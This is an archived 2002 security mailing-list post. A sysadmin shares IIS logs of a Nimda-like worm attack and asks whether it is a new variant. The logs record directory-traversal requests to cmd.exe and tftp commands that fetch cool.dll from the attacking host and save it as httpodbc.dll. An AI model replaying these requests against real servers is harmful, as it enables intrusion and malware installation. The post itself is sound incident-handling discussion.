Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Another Nimda attack??

From: "Eugene Chua Yew Gin" <chuayg () 1-net com sg>
Date: Tue, 17 Sep 2002 17:42:37 +0800


Hi, need some advice for the below log, can anyone advice if its are a pattern
of Nimda which I find it rather strange because it downloads cool.dll and
httpodbc.dll instead of Admin.dll.  Norton Antivirus reported a W32.Nimda.E@MM
(dr) virus, is it a new variant??

Thanks and regards.

2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /scripts/root.exe /c+dir 404 -
2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /c/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /d/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:53:25 202.100.249.231 - xxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2002-09-16 07:53:56 202.100.249.231 - xxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20
cool.dll%20c:\httpodbc.dll 502 -
2002-09-16 07:54:24 202.100.249.231 - 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2002-09-16 07:54:51 202.100.249.231 - 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2002-09-16 07:54:53 202.100.249.231 - 80 GET /scripts/..%5c../httpodbc.dll - 500
-
2002-09-16 07:54:53 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2002-09-16 07:54:54 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2002-09-16 07:54:54 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-16 07:54:57 202.100.249.231 - 80 GET
/msadc/..%5c../..%5c../..%5c/..

Á
../..

Á
../..

Á
../winnt/system32/cmd.exe /c+dir
403 -
2002-09-16 07:54:57 202.100.249.231 - 80 GET
/scripts/..

Á
../winnt/system32/cmd.exe /c+dir 500 -
2002-09-16 07:54:58 202.100.249.231 - 80 GET /scripts/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:54:58 202.100.249.231 - 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 200 -


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: